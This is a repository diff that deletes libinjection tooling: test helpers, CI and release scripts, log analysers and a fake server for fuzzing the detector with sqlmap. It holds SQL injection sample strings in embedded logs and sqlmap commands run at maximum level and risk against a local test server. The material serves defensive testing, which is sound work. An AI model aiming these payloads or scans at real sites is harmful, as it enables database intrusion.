libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
|
||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_folding(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
libinjection.sqli_fingerprint(sql_state,
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
||||
for i = 1, sql_state.fingerprint:len() do
|
||||
-- c array is still 0 based
|
||||
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
|
||||
end
|
||||
-- hack for when there is no output
|
||||
if out == '' then
|
||||
out = '\n'
|
||||
end
|
||||
|
||||
return out
|
||||
end
|
||||
|
||||
function test_fingerprints(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
local issqli = libinjection.is_sqli(sql_state)
|
||||
if issqli == 1 then
|
||||
out = sql_state.fingerprint
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
|
@ -1,85 +0,0 @@
|
|||
#!/bin/sh
|
||||
# this is the script that runs in CI
|
||||
set -e
|
||||
|
||||
DASH=----------------------
|
||||
echo $DASH
|
||||
gcc --version
|
||||
echo $DASH
|
||||
make clean
|
||||
make -e check
|
||||
make clean
|
||||
|
||||
#
|
||||
# Code coverage
|
||||
#
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
|
||||
echo $DASH
|
||||
echo "Generating code coverage"
|
||||
echo "CFLAGS=$CFLAGS"
|
||||
echo
|
||||
make -e check
|
||||
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
|
||||
echo "uploading to coveralls"
|
||||
coveralls \
|
||||
--gcov-options '\-lp' \
|
||||
--exclude-pattern '.*h' \
|
||||
--exclude src/reader.c \
|
||||
--exclude src/example1.c \
|
||||
--exclude src/fptool.c \
|
||||
--exclude src/test_speed_sqli.c \
|
||||
--exclude src/test_speed_xss.c \
|
||||
--exclude src/testdriver.c \
|
||||
--exclude src/html5_cli.c \
|
||||
--exclude src/sqli_cli.c \
|
||||
--exclude python
|
||||
fi
|
||||
echo
|
||||
unset CC
|
||||
unset CFLAGS
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
clang --version
|
||||
echo $DASH
|
||||
./configure-clang.sh
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
echo "CLANG STATIC ANALYZER"
|
||||
echo
|
||||
cd src
|
||||
make analyze
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
cppcheck --version
|
||||
echo
|
||||
|
||||
cppcheck --std=c89 \
|
||||
--enable=all \
|
||||
--inconclusive \
|
||||
--suppress=variableScope \
|
||||
--suppress=missingIncludeSystem \
|
||||
--quiet \
|
||||
--error-exitcode=1 \
|
||||
--template='{file}:{line} {id} {severity} {message}' \
|
||||
.
|
||||
echo "passed"
|
||||
|
||||
echo $DASH
|
||||
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
|
||||
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
|
||||
echo "GCC + VALGRIND"
|
||||
echo $VALGRIND
|
||||
echo
|
||||
make clean
|
||||
make -e check
|
||||
unset VALGRIND
|
||||
unset CFLAGS
|
||||
echo
|
||||
|
||||
echo
|
||||
echo "Done!"
|
|
@ -1,28 +0,0 @@
|
|||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
# automated basic git tagging
|
||||
# 1) edit the version number in
|
||||
# c/libinjection_sqli.c
|
||||
# pyton/setup.py
|
||||
# 2) git add and commit
|
||||
# 3) run this
|
||||
# 4) done!
|
||||
#
|
||||
|
||||
# get tag number
|
||||
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
|
||||
|
||||
TAG="v${TAG}"
|
||||
|
||||
echo "TAG = ${TAG}"
|
||||
echo "Tagging locally"
|
||||
git tag -a "${TAG}" -m ${TAG}
|
||||
echo "Sharing..."
|
||||
git push origin "${TAG}"
|
||||
|
||||
git tag
|
||||
echo "DONE"
|
||||
|
||||
|
||||
|
|
@ -1,45 +0,0 @@
|
|||
LIBINJECTION
|
||||
==========================
|
||||
|
||||
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
|
||||
|
||||
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
|
||||
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
|
||||
* Excellent detection of SQLi.
|
||||
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
|
||||
* Easy to test and QA
|
||||
* Easy to integrate and extend
|
||||
|
||||
### [Try it now](/diagnostics)
|
||||
|
||||
### Easy to integrate
|
||||
|
||||
* Standard C code, and compiles as C99 and C++, with bindings to
|
||||
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
|
||||
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
|
||||
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
|
||||
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
|
||||
* Compiles on Linux/Unix/BSD, Mac and Windows
|
||||
* No threads used and thread safe
|
||||
* No recursion
|
||||
* No (heap) memory allocation
|
||||
* No extenal library dependencies
|
||||
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
|
||||
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
|
||||
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
|
||||
|
||||
Third-Party Ports
|
||||
---------------------
|
||||
|
||||
* [java](https://github.com/Kanatoko/libinjection-Java)
|
||||
* At least two .NET ports exists
|
||||
* Another python wrapper
|
||||
|
||||
Applications
|
||||
---------------------
|
||||
|
||||
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
|
||||
* [IronBee](https://www.ironbee.com) - since May 2013
|
||||
* Proprietary Honeypot
|
||||
* Proprietary WAF, Russia
|
||||
* Proprietary WAF, Japan
|
File diff suppressed because one or more lines are too long
Before Width: | Height: | Size: 944 KiB |
|
@ -1,64 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
import sys
|
||||
import re
|
||||
import libinjection
|
||||
import urllib
|
||||
import urlparse
|
||||
|
||||
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
|
||||
|
||||
notsqli = set([
|
||||
'1ov',
|
||||
'UEvEv',
|
||||
'v',
|
||||
'Uv',
|
||||
'Uv,',
|
||||
'UoEvE',
|
||||
'1v',
|
||||
'sov',
|
||||
'1nn',
|
||||
'UonnE',
|
||||
'no1',
|
||||
'Evk',
|
||||
'E1k',
|
||||
'E11k',
|
||||
'Ek',
|
||||
'Uv,Ev',
|
||||
'UvEvk',
|
||||
'UvEv,',
|
||||
'Uvon'
|
||||
])
|
||||
|
||||
def doline(logline):
|
||||
"""
|
||||
...GET /diagnostics?id=%22union+select HTTP/1.1
|
||||
"""
|
||||
mo = logre.search(logline)
|
||||
if not mo:
|
||||
return
|
||||
|
||||
sqli= False
|
||||
fp = None
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if argsqli:
|
||||
fp = extra['fingerprint']
|
||||
print urllib.quote(val)
|
||||
sqli = sqli or argsqli
|
||||
|
||||
if False: # and not sqli:
|
||||
#print "\n---"
|
||||
#print mo.group(1)
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if not argsqli and extra['fingerprint'] not in notsqli:
|
||||
print "NO", extra['fingerprint'], mo.group(1)
|
||||
print " ", val
|
||||
|
||||
if __name__ == '__main__':
|
||||
for line in sys.stdin:
|
||||
doline(line)
|
|
@ -1,213 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import datetime
|
||||
import json
|
||||
import sys
|
||||
from urlparse import *
|
||||
import urllib
|
||||
import libinjection
|
||||
|
||||
from tornado import template
|
||||
from tornado.escape import *
|
||||
|
||||
import re
|
||||
import calendar
|
||||
|
||||
months = {
|
||||
'Jan':'01',
|
||||
'Feb':'02',
|
||||
'Mar':'03',
|
||||
'Apr':'04',
|
||||
'May':'05',
|
||||
'Jun':'06',
|
||||
'Jul':'07',
|
||||
'Aug':'08',
|
||||
'Sep':'09',
|
||||
'Oct':'10',
|
||||
'Nov':'11',
|
||||
'Dec':'12'
|
||||
}
|
||||
|
||||
# "time_iso8601":"2013-08-04T03:51:18+00:00"
|
||||
def parse_date(datestr):
|
||||
elems = (
|
||||
datestr[7:11],
|
||||
months[datestr[3:6]],
|
||||
datestr[0:2],
|
||||
datestr[12:14],
|
||||
datestr[15:17],
|
||||
datestr[18:20],
|
||||
)
|
||||
|
||||
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
|
||||
|
||||
|
||||
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
|
||||
|
||||
def parse_apache(line):
|
||||
mo = apachelogre.match(line)
|
||||
if not mo:
|
||||
return None
|
||||
(time_iso, timestamp) = parse_date(mo.group(4))
|
||||
try:
|
||||
(method, uri, protocol) = mo.group(5).split(' ', 2)
|
||||
except ValueError:
|
||||
(method, uri, protocol) = ('-', '-', '-')
|
||||
data = {
|
||||
'remote_addr': mo.group(1),
|
||||
'time_iso8601': time_iso,
|
||||
'timestamp' : timestamp,
|
||||
'request_protocol': protocol,
|
||||
'request_method': method,
|
||||
'request_uri': uri,
|
||||
'request_length': '',
|
||||
'request_time': '',
|
||||
'status': mo.group(6),
|
||||
'bytes_sent': '',
|
||||
'body_bytes-sent': int(mo.group(7)),
|
||||
'http_referrer': mo.group(8),
|
||||
'http_user_agent': mo.group(9),
|
||||
'ssl_cipher': '',
|
||||
'ssl_protocol': ''
|
||||
}
|
||||
return data
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
"""
|
||||
Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 40):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def doline(line):
|
||||
|
||||
line = line.replace("\\x", "%").strip()
|
||||
try:
|
||||
data = json.loads(line)
|
||||
except ValueError, e:
|
||||
data = parse_apache(line)
|
||||
|
||||
if data is None:
|
||||
sys.stderr.write("BAD LINE: {0}\n".format(line))
|
||||
return None
|
||||
|
||||
if not data.get('request_uri','').startswith("/diagnostics"):
|
||||
return None
|
||||
|
||||
urlparts = urlparse(data['request_uri'])
|
||||
if len(urlparts.query) == 0:
|
||||
return None
|
||||
|
||||
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
|
||||
|
||||
target = None
|
||||
for k,v in qsl:
|
||||
if k == 'id':
|
||||
target = v
|
||||
break
|
||||
|
||||
if target is None:
|
||||
#print "no 'id'"
|
||||
return None
|
||||
|
||||
# part one, normal decode
|
||||
target = urllib.unquote_plus(target)
|
||||
|
||||
# do it again, but preserve '+'
|
||||
target = urllib.unquote(target)
|
||||
|
||||
sstate = libinjection.sqli_state()
|
||||
# BAD the string created by target.encode is stored in
|
||||
# sstate but not reference counted, so it can get
|
||||
# deleted by python
|
||||
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
|
||||
|
||||
# instead make a temporary var in python
|
||||
# with the same lifetime as sstate (above)
|
||||
try:
|
||||
targetutf8 = target.encode('utf-8')
|
||||
#targetutf8 = target
|
||||
except UnicodeDecodeError, e:
|
||||
targetutf8 = target
|
||||
#if type(target) == str:
|
||||
# sys.stderr.write("Target is a string\n")
|
||||
#if type(target) == unicode:
|
||||
# sys.stderr.write("Target is unicde\n")
|
||||
#sys.stderr.write("OOps: {0}\n".format(e))
|
||||
#sys.stderr.write("Encode error: {0}\n".format(target))
|
||||
|
||||
|
||||
try:
|
||||
libinjection.sqli_init(sstate, targetutf8, 0)
|
||||
except TypeError:
|
||||
sys.stderr.write("fail in decode: {0}".format(targetutf8))
|
||||
if type(target) == str:
|
||||
sys.stderr.write("Target is a string\n")
|
||||
if type(target) == unicode:
|
||||
sys.stderr.write("Target is unicde\n")
|
||||
return None
|
||||
|
||||
sqli = bool(libinjection.is_sqli(sstate))
|
||||
|
||||
return (target, sqli, sstate.fingerprint, data['remote_addr'])
|
||||
|
||||
if __name__ == '__main__':
|
||||
s = """
|
||||
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
|
||||
"""
|
||||
s = """
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
"""
|
||||
if len(sys.argv) == 2:
|
||||
fh = open(sys.argv[1], 'r')
|
||||
else:
|
||||
fh = sys.stdin
|
||||
|
||||
targets = set()
|
||||
table = []
|
||||
for line in fh:
|
||||
parts = doline(line.strip())
|
||||
if parts is None:
|
||||
continue
|
||||
|
||||
# help it render in HTML
|
||||
if parts[0] in targets:
|
||||
continue
|
||||
else:
|
||||
targets.add(parts[0])
|
||||
|
||||
# add link
|
||||
# add form that might render ok in HTML
|
||||
# is sqli
|
||||
# fingerprint
|
||||
table.append( (
|
||||
"/diagnostics?id=" + url_escape(parts[0]),
|
||||
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
|
||||
parts[1],
|
||||
parts[2],
|
||||
parts[3]
|
||||
)
|
||||
)
|
||||
|
||||
table = reversed(table)
|
||||
|
||||
loader = template.Loader(".")
|
||||
|
||||
txt = loader.load("logtable.html").generate(
|
||||
table=table,
|
||||
now = str(datetime.datetime.now()),
|
||||
ssl_protocol='',
|
||||
ssl_cipher=''
|
||||
)
|
||||
|
||||
print txt
|
|
@ -1,8 +0,0 @@
|
|||
#!/bin/bash
|
||||
fname=$1
|
||||
|
||||
echo '{% extends "base.html" %}'
|
||||
echo '{% block body %}'
|
||||
#github-markup $fname
|
||||
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
|
||||
echo '{% end %}'
|
|
@ -1,79 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
#
|
||||
# Sync ModSecurity / libinjection
|
||||
#
|
||||
|
||||
# explode on error
|
||||
set -e
|
||||
|
||||
#
|
||||
# CLONE LIBINJECTION
|
||||
#
|
||||
if [ ! -d libinjection ]; then
|
||||
git clone https://github.com/client9/libinjection.git
|
||||
else
|
||||
(cd libinjection; git pull)
|
||||
fi
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# CLONE MODSECURITY
|
||||
#
|
||||
if [ ! -d ModSecurity ]; then
|
||||
git clone https://github.com/client9/ModSecurity.git
|
||||
else
|
||||
( cd ModSecurity; git pull )
|
||||
fi
|
||||
pwd
|
||||
|
||||
#
|
||||
# Use right branch
|
||||
#
|
||||
(cd ModSecurity; git checkout remotes/trunk )
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# COPY IN NEW LIBINJECTION
|
||||
#
|
||||
cp libinjection/COPYING.txt ModSecurity/apache2/
|
||||
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
|
||||
|
||||
|
||||
#
|
||||
# REGENERATE / BUILD
|
||||
#
|
||||
cd ModSecurity
|
||||
./autogen.sh
|
||||
./configure
|
||||
make
|
||||
make distclean
|
||||
|
||||
#
|
||||
# ADD NEW BITS
|
||||
#
|
||||
git add apache2/libinjection/COPYING.txt
|
||||
git add apache2/libinjection/libinjection.h
|
||||
git add apache2/libinjection/libinjection_sqli.h
|
||||
git add apache2/libinjection/libinjection_sqli.c
|
||||
git add apache2/libinjection/libinjection_sqli_data.h
|
||||
|
||||
# this file seems to get modified, reset just to be safe
|
||||
git checkout standalone/Makefile.in
|
||||
|
||||
git commit -m 'libinjection sync'
|
||||
|
||||
#
|
||||
# PUSH TO SPECIAL BRANCH
|
||||
#
|
||||
echo "pushing to remotes/trunk"
|
||||
git push origin remotes/trunk
|
||||
|
||||
#
|
||||
# PROFIT
|
||||
#
|
|
@ -1,47 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
mysql_ops = (
|
||||
'AND',
|
||||
'&&',
|
||||
'=',
|
||||
'&',
|
||||
'|',
|
||||
'^',
|
||||
'DIV',
|
||||
'/',
|
||||
'<=>',
|
||||
'>=',
|
||||
'>',
|
||||
'<<',
|
||||
'<=',
|
||||
'<',
|
||||
'LIKE',
|
||||
'-',
|
||||
'%',
|
||||
'MOD',
|
||||
'!=',
|
||||
'<>',
|
||||
'NOT LIKE',
|
||||
'NOT REGEXP',
|
||||
'OR',
|
||||
'||',
|
||||
'+',
|
||||
'REGEXP',
|
||||
'>>',
|
||||
'RLIKE',
|
||||
'NOT RLIKE',
|
||||
'SOUNDS LIKE',
|
||||
'*',
|
||||
'XOR'
|
||||
)
|
||||
|
||||
print '# mysql implicit conversions tests'
|
||||
|
||||
for op in mysql_ops:
|
||||
if op == '+':
|
||||
op = '%2B'
|
||||
|
||||
print "A' {0} 'B".format(op)
|
||||
print "A '{0}' B".format(op)
|
||||
print "'{0}'".format(op)
|
||||
print "' {0} '".format(op)
|
|
@ -1,111 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# A 'nullserver' that accepts input and generates output
|
||||
# to trick sqlmap into thinking it's a database-driven site
|
||||
#
|
||||
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import libinjection
|
||||
|
||||
class ShutdownHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global fd
|
||||
fd.close()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
class CountHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global count
|
||||
self.write(str(count) + "\n")
|
||||
|
||||
def boring(arg):
|
||||
if arg == '':
|
||||
return True
|
||||
|
||||
if arg == 'foo':
|
||||
return True
|
||||
|
||||
if arg == 'NULL':
|
||||
return True
|
||||
|
||||
try:
|
||||
float(arg)
|
||||
return True
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
return False;
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
|
||||
def get(self):
|
||||
global fd
|
||||
global count
|
||||
params = self.request.arguments.get('id', [])
|
||||
sqli = False
|
||||
|
||||
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
|
||||
# if no args, or a single value with uninteresting input
|
||||
# then just exit
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
return
|
||||
|
||||
for arg in params:
|
||||
sqli = libinjection.detectsqli(arg)
|
||||
if sqli:
|
||||
break
|
||||
|
||||
# we didn't detect it :-(
|
||||
if not sqli:
|
||||
count += 1
|
||||
args = [ arg.strip() for arg in params ]
|
||||
#fd.write(' | '.join(args) + "\n")
|
||||
for arg in args:
|
||||
extra = {}
|
||||
sqli = libinjection.detectsqli(arg, extra)
|
||||
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
|
||||
#for arg in param:
|
||||
# fd.write(arg + "\n")
|
||||
# #fd.write(urllib.quote_plus(arg) + "\n")
|
||||
self.set_status(500)
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
else:
|
||||
self.write("<html><head><title>sqli</title></head><body></body></html>")
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"cookie_secret": "yo mama sayz=",
|
||||
"xsrf_cookies": True,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/null", NullHandler),
|
||||
(r"/shutdown", ShutdownHandler),
|
||||
(r"/count", CountHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
global fd
|
||||
global count
|
||||
|
||||
count = 0
|
||||
|
||||
fd = open('./sqlmap-false-negatives.txt', 'w')
|
||||
|
||||
import tornado.options
|
||||
#tornado.options.parse_config_file("/etc/server.conf")
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
http_server = tornado.httpserver.HTTPServer(application)
|
||||
http_server.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
|
@ -1,29 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Starts a bogus webserver that logs all input
|
||||
# Then runs sqlmap
|
||||
#
|
||||
|
||||
./nullserver.py --logging=none &
|
||||
|
||||
if [ ! -d "sqlmap" ]; then
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git
|
||||
else
|
||||
(cd sqlmap; git pull)
|
||||
fi
|
||||
|
||||
SQLMAP=./sqlmap/sqlmap.py
|
||||
URL=http://127.0.0.1:8888
|
||||
|
||||
HPP=
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
HPP=--hpp
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
curl -o /dev/null ${URL}/shutdown
|
||||
|
|
@ -1,339 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
import datetime
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
import urlparse
|
||||
try:
|
||||
import libinjection
|
||||
except:
|
||||
pass
|
||||
|
||||
from tornado import template
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import tornado.wsgi
|
||||
import tornado.escape
|
||||
import tornado.options
|
||||
|
||||
def breakapart(s):
|
||||
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
|
||||
"""
|
||||
return s.replace(',', ', ').replace('/*',' /*')
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
""" Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 20):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def print_token_string(tok):
|
||||
"""
|
||||
returns the value of token, handling opening and closing quote characters
|
||||
"""
|
||||
out = ''
|
||||
if tok.str_open != '\0':
|
||||
out += tok.str_open
|
||||
out += tok.val
|
||||
if tok.str_close != '\0':
|
||||
out += tok.str_close
|
||||
return out
|
||||
|
||||
def print_token(tok):
|
||||
"""
|
||||
prints a token for use in unit testing
|
||||
"""
|
||||
out = ''
|
||||
if tok.type == 's':
|
||||
out += print_token_string(tok)
|
||||
elif tok.type == 'v':
|
||||
vc = tok.count;
|
||||
if vc == 1:
|
||||
out += '@'
|
||||
elif vc == 2:
|
||||
out += '@@'
|
||||
out += print_token_string(tok)
|
||||
else:
|
||||
out += tok.val
|
||||
return (tok.type, out)
|
||||
|
||||
def alltokens(val, flags):
|
||||
|
||||
if flags & libinjection.FLAG_QUOTE_SINGLE:
|
||||
contextstr = 'single'
|
||||
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
|
||||
contextstr = 'double'
|
||||
else:
|
||||
contextstr = 'none'
|
||||
|
||||
if flags & libinjection.FLAG_SQL_ANSI:
|
||||
commentstr = 'ansi'
|
||||
elif flags & libinjection.FLAG_SQL_MYSQL:
|
||||
commentstr = 'mysql'
|
||||
else:
|
||||
raise RuntimeException("bad quote context")
|
||||
|
||||
parse = {
|
||||
'comment': commentstr,
|
||||
'quote': contextstr
|
||||
}
|
||||
args = []
|
||||
sqlstate = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sqlstate, val, flags)
|
||||
count = 0
|
||||
while count < 25:
|
||||
count += 1
|
||||
ok = libinjection.sqli_tokenize(sqlstate)
|
||||
if ok == 0:
|
||||
break
|
||||
args.append(print_token(sqlstate.current))
|
||||
|
||||
|
||||
parse['tokens'] = args
|
||||
|
||||
args = []
|
||||
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
|
||||
for i in range(len(sqlstate.fingerprint)):
|
||||
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
|
||||
parse['folds'] = args
|
||||
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
parse['fingerprint'] = fingerprint
|
||||
# todo add stats
|
||||
|
||||
return parse
|
||||
|
||||
class PageHandler(tornado.web.RequestHandler):
|
||||
def get(self, pagename):
|
||||
if pagename == '':
|
||||
pagename = 'home'
|
||||
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render(
|
||||
pagename + '.html',
|
||||
title = pagename.replace('-',' '),
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class XssTestHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
settings = self.application.settings
|
||||
|
||||
ldr = template.Loader(".")
|
||||
|
||||
args = ['', '', '', '', '', '', '', '', '', '']
|
||||
|
||||
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
|
||||
for kv in qsl:
|
||||
print kv
|
||||
try:
|
||||
index = int(kv[0])
|
||||
val = tornado.escape.url_unescape(kv[1])
|
||||
print "XXX", index, val
|
||||
args[index] = val
|
||||
except Exception,e:
|
||||
print e
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.write(ldr.load('xsstest.html').generate(args=args))
|
||||
|
||||
class DaysSinceHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
lastevasion = datetime.date(2013, 9, 12)
|
||||
today = datetime.date.today()
|
||||
daynum = (today - lastevasion).days
|
||||
if daynum < 10:
|
||||
days = "00" + str(daynum)
|
||||
elif daynum < 100:
|
||||
days = "0" + str(daynum)
|
||||
else:
|
||||
days = str(daynum)
|
||||
|
||||
self.render(
|
||||
"days-since-last-bypass.html",
|
||||
title='libinjection: Days Since Last Bypass',
|
||||
days=days,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
arg = self.request.arguments.get('type', [])
|
||||
if len(arg) > 0 and arg[0] == 'tokens':
|
||||
return self.get_tokens()
|
||||
else:
|
||||
return self.get_fingerprints()
|
||||
|
||||
def get_tokens(self):
|
||||
ids = self.request.arguments.get('id', [])
|
||||
|
||||
if len(ids) == 1:
|
||||
formvalue = ids[0]
|
||||
else:
|
||||
formvalue = ''
|
||||
|
||||
val = urllib.unquote(formvalue)
|
||||
parsed = []
|
||||
